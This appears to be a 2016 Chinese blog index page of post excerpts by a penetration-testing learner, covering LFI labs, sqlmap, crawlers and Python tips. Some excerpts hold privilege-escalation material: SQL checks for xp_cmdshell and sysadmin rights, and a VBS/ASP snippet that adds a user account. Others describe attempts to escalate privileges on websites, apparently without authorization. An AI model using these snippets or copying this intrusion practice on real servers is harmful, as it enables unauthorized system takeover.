自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(18)
  • 资源 (1)
  • 收藏
  • 关注

原创 [PHP]搭建Laravel心路历程

经过了2小时左右总算是把环境搭好了,其实很简单,只是中间绕过的弯很多从前一直对框架没有一个清晰的认识,经过此次学习才清晰认识到框架就是一个搭好结构的代码,让你去填补初学还是不应该接触框架,多写之后再谈框架

2016-09-14 01:07:34 362

原创 [LFI]Phpinfo本地文件包含漏洞环境搭建分析

0x00本地文件包含漏洞即网站未对用户可控变量进行控制,导致用户可以控制包含变量。0x01参考wooyun上的教程中遇到问题如下:Can not  connect to the docker deamon权限不够,docker未提示,指令前加sudosudo docker run –rm -p “8901:80” janes/lfi_phpinfo8901为本机端口

2016-08-29 23:44:09 4581

原创 Wooyun最新确认漏洞爬虫V0.02

Wooyun最新确认漏洞爬虫v0.02#coding:utf-8import requestsimport refrom bs4 import BeautifulSoupwooyun_confirm='http://www.wooyun.org/bugs/new_confirm'wooyun_url='http://www.wooyun.org'wooyun_url_result=re.

2016-05-22 15:48:20 1571

原创 [python爬虫]爬取贴吧某页美女图片+爬取糗百美女图片

#coding:utf-8import requests,pyquery,urllibimport redef get_html(url): html=urllib.urlopen(url).read() return htmldef get_image(html): reg=r'src="(.*?\.jpg)"' #html=requests.get(url).read()

2016-05-18 22:08:56 573

原创 [Python2.7]python关于sys.agrv的使用

sys.argv是你接收的参数的列表 []比如你这段代码名字叫做test.py 运行python test.py 192.168.0.1 test.txtsys.argv[0] ----test.pysys.argv[1] ----192.168.0.1sys.argv[2] ----test.txt

2016-04-27 23:10:07 462

转载 [渗透测试]Sqlmap使用参数说明

SQLMAP参数介绍sqlmap的使用方式:python sqlmap.py [options];sqlmap中一共有以下十六个选项卡:帮助选项卡;Target(目标选项卡);Request(请求选项卡);Optimization(优化选项卡);Injection(注射选项卡);Detection(探测选项卡);Techniques(注入技术选项卡);Fingerpri

2016-04-04 12:06:45 5677

原创 [渗透测试]XML注入

今天想研究一下,传说中的XML注入,下载了一套有漏洞的网站源码,搭好之后发现并不知道怎么利用这个漏洞,网上的看不懂故先占坑。

2016-04-04 00:05:46 854

原创 [南极星]何处是归处

我想我知道该怎么学习渗透测试了。重现漏洞,理解漏洞,攻破漏洞。

2016-04-03 12:18:12 462

原创 [博弈游戏]Euclid's Game(0099)-SWUST_OJ

DescriptionStarts with two unequal positive numbers (M,N and M>N) on the board. Two players move in turn. On each move, a player has to write on the board a positive number equal to the difference

2016-04-02 21:13:53 710

原创 [渗透测试]扫目录,Sqlmap利用均超时,利用dirb扫描

今天碰到一个网友传来的Webshell地址,问我对方如何取得webshell。网站为阿里云服务器,存在明显的注入漏洞,但是任何语句都会令网页报错,sqlmap一直超时,御剑扫描目录1个线程也会导致被屏蔽IP。经一学长提点,利用kali中的dirb工具搜索目录,顺利找到后台,却始终找不到方法注入.同时也不明白为什么dirb扫描目录就不会被屏蔽 。 郁呀.......

2016-03-31 23:37:52 4348

原创 2016-3-31 提权一直在失败从未成功

今天又提了两个网站的权(尝试),又失败了,一个只要运行命令就提示组策略阻止,另一个就是net user无法运行,溢出exp,pr,巴西烤肉都上了,还是不行。自己还是无法找出服务器的Mysql的账号密码在哪,大马的搜索功能有问题。明天尝试一下远控连接shell

2016-03-31 00:07:43 402

原创 [上传绕过]上传后乱码页面查找上传路径

发现一个上传页面,点击上传右键查看源码发现上传路径

2016-03-28 21:01:02 384

原创 [提权禁区]1433端口入侵提权

占位.....一切待我成功再说...

2016-03-27 00:56:02 4349 3

原创 [提权禁区] SQL语句利用xp_cmdshell获取权限

判断权限是不是saselect is_srvrolemember('sysadmin')返回是1说明是sa判断xp_cmdshell扩展存储是否存在select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'返回为l则证明存在判

2016-03-27 00:53:50 1433

原创 [提权禁区]利用vbs添加管理员用户

新建一个asp文件,输入代码,然后访问即可Set onlineServer=GetObject("WinNT://127.0.0.1")Set newuser=onlineServer.Create("user","misya")NewUser.SetPassword "misaya"NewUser.FullName="misaya test"NewUser.Descr

2016-03-26 15:31:50 1050

原创 [python]int函数带参用法

print (int(2.0))>>2若int(x,base)中base无,则int(2.0)即为将x转化为整形数字. 若int(x,base)中base有参数,则x一定为字符串例如:print (int('101',2))>>5此处2指的是101为2进制数,int()函数则是将其转化为10进制数进行输出

2016-03-23 18:20:13 1048

原创 [python]安装BeautifulSoup遇到问题

安装BeautifulSoup,结果利用语句from bs4 import BeautifulSoup时一直报错,网上问答都没有相似情况最后看到了BeautifulSoup官方文档是因为用py3编译py2代码的原因,所下载的BeautifulSoup是py2的,文档说会自动转换代码,不知为什么没有自己转换下次遇到问题最好先翻官方文档,毕竟百度

2016-03-23 13:03:47 487

原创 [python]Python中from...import与import......as与with.....as

from...import与import区别在于import直接导入指定的库,而from....import则是从指定的库中导入指定的模块import...as则是将import A as B,给予A库一个B的别称,帮助记忆with....as具体不太清楚,可以减少复杂度

2016-03-22 23:59:58 1735

C++雷霆战机

利用Opencv,C++写的飞机类游戏,画面精美,音效强劲

2015-07-26

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除